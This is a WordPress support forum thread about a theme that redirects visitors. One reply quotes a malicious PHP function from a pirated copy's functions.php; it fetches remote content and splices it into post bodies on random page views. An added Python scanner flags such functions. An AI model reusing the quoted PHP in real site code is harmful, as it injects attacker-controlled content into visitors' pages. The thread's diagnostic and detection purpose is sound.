Viewing 8 posts - 1 through 8 (of 8 total)

    My themes always redirect to, let me know when you want to access, I deactivate the themes for safety or Google will ban my domain forever


    Hi ProjectIndo,

    I would suggest contacting your hosting provider and letting them know what is going on. The issue is most likely that your server has been compromised one way or another and some malicious code has been injected somewhere.

    Your host should be able to do a security scan and assist you further.




    Hello, I was overseas dealing with some business, came back to my warm home and am checking out my WordPress. I have installed WordPress Security Scan, hope it will help. Thank you


    Let us know how it goes and definitely contact your hosting provider. They are absolutely the best equipped to deal with malicious code on a server. Even something like a WordPress security plugin can’t tell you if you have had your main cPanel account compromised or something like that.




    It’s not your HOST, it’s your THEME.

    In particular, a malicious line of code in functions.php

    This suggests to me that you’ve downloaded a stolen copy of the theme, or someone has given/sold you a stolen version.

    Look in the early section of your functions.php file and you’ll see something like this:

    function ins_php_in_post($content){
        $percentage = 25;
        // Only acts on roughly a quarter of page views
        if (rand(0, 100) < $percentage){
            ob_start();
            if(function_exists('curl_init')) {
                $url = "";
                $ch = curl_init();
                $timeout = 5;
                curl_setopt($ch,CURLOPT_URL,$url);
                curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
                curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
                $data = curl_exec($ch);
                curl_close($ch);
                echo "$data";
            }
            // Whatever the remote URL returned is captured here
            $text = ob_get_clean();
            $pos = rand(0, strlen($content));
            $txtPrePos = substr($content, 0, $pos);
            $txtPostPos = substr($content, $pos);
            $openPos = strrpos($txtPrePos, "<");
            if ($openPos !== false){
                $closePos = strrpos($txtPrePos, ">");
                if ($openPos > $closePos || $closePos === false){
                    $pos = strpos($content, ">", $pos) + 1;
                }
            }
            $spos = strpos($content, " ", $pos);
            if ($spos === false) {
                $spos = strlen($content);
            }
            // Fetched text is spliced into the post body at a random position
            $content = substr($content, 0, $spos) . " " . $text . substr($content, $spos);
        }
        return $content;
    }

    The quickest fix is to spend $60 and BUY the theme!

    If you try and remove malicious code, you’ll no doubt NOT get it ALL out, and you’ll have problems down the line with your website’s functionality. It’s just not worth the time or hassle!
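
    Added example, not part of the thread and not code from the theme or its vendor: a heuristic Python scanner that flags PHP functions shaped like the one quoted above, meaning a function that takes `$content`, fetches something remote, and shows at least one more of the traits seen in that snippet. The trait names, the function names and the sample input are assumptions made for this illustration, and the brace matching is naive (it ignores braces inside strings and comments).

```python
import re
from pathlib import Path

# Traits taken from the snippet quoted in the thread above.
TRAITS = {
    "remote_fetch": re.compile(r"\b(curl_exec|wp_remote_get|file_get_contents)\s*\("),
    "random_gate": re.compile(r"\b(mt_rand|rand)\s*\("),
    "output_buffer": re.compile(r"\bob_(start|get_clean)\s*\("),
    "splices_content": re.compile(r"\$content\s*=\s*substr\s*\(\s*\$content"),
}
FUNC_RE = re.compile(r"\bfunction\s+(\w+)\s*\(([^)]*)\)\s*\{")

def function_bodies(source):
    """Yield (name, params, body) for each named function, by naive brace matching."""
    for m in FUNC_RE.finditer(source):
        depth, i = 1, m.end()
        while i < len(source) and depth:
            depth += {"{": 1, "}": -1}.get(source[i], 0)
            i += 1
        yield m.group(1), m.group(2), source[m.end():i - 1]

def scan_source(source):
    """Return {function_name: [traits]} for suspicious $content filters."""
    findings = {}
    for name, params, body in function_bodies(source):
        hits = [t for t, rx in TRAITS.items() if rx.search(body)]
        if "$content" in params and "remote_fetch" in hits and len(hits) >= 2:
            findings[name] = hits
    return findings

def scan_theme(theme_dir):
    """Scan every .php file under a theme directory."""
    results = {}
    for path in Path(theme_dir).rglob("*.php"):
        found = scan_source(path.read_text(errors="replace"))
        if found:
            results[str(path)] = found
    return results

# Constructed sample: one benign helper and a cut-down function shaped like the quoted one.
SAMPLE = r'''<?php
function theme_excerpt_more($more){ return ' ...'; }
function ins_php_in_post($content){ if (rand(0, 100) < 25){ ob_start();
  $ch = curl_init(); $data = curl_exec($ch); echo "$data"; $text = ob_get_clean();
  $content = substr($content, 0, 10) . " " . $text . substr($content, 10); }
  return $content; }
'''

if __name__ == "__main__":
    print(scan_source(SAMPLE))
```

    A hit is a prompt to read the flagged function by hand, not proof of compromise, and a clean result does not show the theme is clean.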



    Did you solve the issue?

    Best regards,



    Hi there!

    I purchased and installed this theme yesterday and some of my page links redirect to as well!



    Can you post a link to a page where the issue occurs please?

    Best regards,



The topic ‘Recent download for Propelsion has a malicious malware’ is closed to new replies.